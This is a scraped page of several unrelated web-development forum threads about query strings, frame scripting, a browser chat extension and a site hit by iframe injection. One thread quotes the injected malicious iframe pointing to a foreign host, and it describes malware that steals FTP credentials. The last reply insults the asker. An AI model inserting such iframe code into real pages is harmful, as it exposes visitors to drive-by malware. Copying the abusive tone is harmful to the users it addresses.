Hi All,
I want to add query string in the URL using javascript but I don't want to reload or redirect the page.
(When I use window.location = "some value", it redirects me to the corresponding page).
I also want to access the query string value in my server side code.
Please help me.

Javascript is purely client side. If you want to retrieve data server side, you need a postback. You may however consider AJAX, which will do a postback, but is capable of doing a postback without the entire page reloading.

My suggestion would be - use web service, to get data to client without postback.
It`s nothing to wory before something happen and when it happents it`s alredy to late to wory!

Hi,
On my website a virus is injecting IFRAME Virus code.
I tried to replace that infected files with the original one,
but that virus again injected the code.
I also tried changing FTP and Control Panel Passwords.
Still the virus has infected the files.
I have also checked my pc for viruses by scanning using Antivirus with updated database.
Bust still this virus has managed to infect my pages.
I have also gone through the log files of domain.
But it doesn’t help me.
The virus injects following type of code in default.asp and index.htm files.
e.g.

<iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>

<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>

The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag.
Please help me. How to stops this virus from infecting my web pages?

Did your Antivirus software identify what virus you have on your PC. Perhaps you need to check the AV web sites for similar problems. Try Google searches for the URI that is being injected.
Are you absolutely certain this is a virus rather than a bug in your code?

I am not sure about that virus is present in my pc.
Because my localhost server is not being infected.
Only my remote files are get infected.
Some kind of robotic software (May be virus) is injecting this code in my website.

Well you need to check every machine involved in this for viruses. You also need to check your code quite carefully to ensure you have not left any security holes that a virus or trojan can break into.

Hey Kiran !
I have the same issue... and I found some data about it.
This virus was supposed to infect machines and stole FTP credentials from your ftp client. But instead of that (at least at my case) it is listening for the traffic flow, and gets your credentials when you make a connection.
Once the user and password were stoled, I found regular connections from foreing IPs.
So for now, I did this:
- remove manualy the iframes in your computer.
- Upload the files
- Change the password and don't use it until you clean this virus.
I couldn't find the name of this virus yet, if you do, please, tell me !
Some tips:
- I have nod32, and it found nothing in my PC.
- Panda security (web scann) can't find nothing either.
- When people with AVG and Avast try to go to an infected page, their AV gives them a message about the threat.
I hope it helps you a bit.

This question makes no sense. Have you been asking for days about the session between http and https ? Why not just make all that section of the site HTTPS ?

HI am developing an extension for mozilla. The extension enables users browsing the same URL to chat with each other.
the issue am concerned with is that is there a way to know the users browsing the same website. Is it against site security policies..
pls do help me...
in general is the extension feasible??

am not particular on firefox extension..i wanted to implement my idea ..thats all..i thought it could be an extension ..
am thinking to implement it in this manner..
User should signing and he can mark which all sites he want to hav this facility of chat..
next once he enters a site he has marked ,extension(software) should be able to allow him enter a chatroom n see who else are online ...
and hav a chat session..
first thing i want to know is is it feasible..
wat r the technical and security issues concerned with this...

Hi all,
I have an issue that is driving me mad, for few days. I hope some of the experts here can provide some help.
The web page is quite simple, with three frames:
Top frame <frame name="banner">
Left frame <frame name="tabnav">
Right frame, is the main target that host the images, etc...
The left frame also holds a folder tree view, every folder contains links of other html pages that will be loaded in the main target (right frame).
The tree view is generated and loaded dynamically from an external "tree.js" file.
All I need to do, is to get the folder description (name) from the selected tree view and displayed in the top frame as a simple text.
I have added a test line within the "tree.js" file to retrieve the selected folder name, as follow:
alert(folder.desc);
Which works ok. However, I can not find the way to write the description to the body of the top frame?
I can get to the top frame from within the left frame (outside the tree.js file, just html within the left frame), by simple using the following code:
<script type="text/javascript">
parent.banner.document.write("Test");
</script>
Which also works fine.
However trying to use the same code within the tree.js file (without the <script...> headers):
parent.banner.document.write("Test");
Generates an error on the page.
Is there an easier way to achieve this?
Any help is much appreciated.

For frames or IFrames the outer page is referenced using parent. So if you call parent.banner.document it will represent the document that is named as banner.
Now tell me what error you are getting. Lets say you have a span in banner which you need to access when treeview node is clicked, use this...
onclick="javascript:parent.banner.document.getElementById('yourspanid').innerHTML = folder.desc;";
Does it works... ??

Unfortunately still doesn't work for me.
Based on your comments I should be able to write from the tree.js file to my banner frame using the parent call. I have even tried the following:
parent.banner.document.write("Hello");
Which I know it will write the entire document, just as a test. Still won't write to it. 
I also tried the second comment:

And doesn't work for me.
The following are the changes I have done to try the code:
Added to the top frame the following code:

The main document clearly defines the frame name, as follow:

That should provide me a good reference to reach from anywhere on the active html document.
I then added the code you mention to the "tree.js" file within the function that clicks the node on the tree view:
onclick="javascript:parent.banner.document.getElementById('SpanDesc').innerHTML = folder.desc;"
Since that didn't work, I tried to remove the onclick event, thinking that only applies to java scrpit within HTML, and tried the following:
parent.banner.document.getElementById('SpanDesc').innerHTML = folder.desc;
Which doesn't work neither.
The following is the function of the existing "tree.js" file that gets called every time the user clicks a node:

This is basically a simplified version of a question you've asked twice. It's obvious you have no idea what you're doing. Why are you even using asp ? It's a lot harder than ASP.NET and it's clear you are no-where near experienced enough to write anything meaningful in it. If I were you, I'd contact your client and say you're dropping the job, or if it's for personal use, I'd find someone to pay to do it, because you're just plain not up to it. You post question after question, you never show any signs of having tried to do anything yourself, you don't respond to answers, you ask the same thing over and over, and you generally show every sign of being absolutely useless. Give up now, this is only going to end in disaster for you.
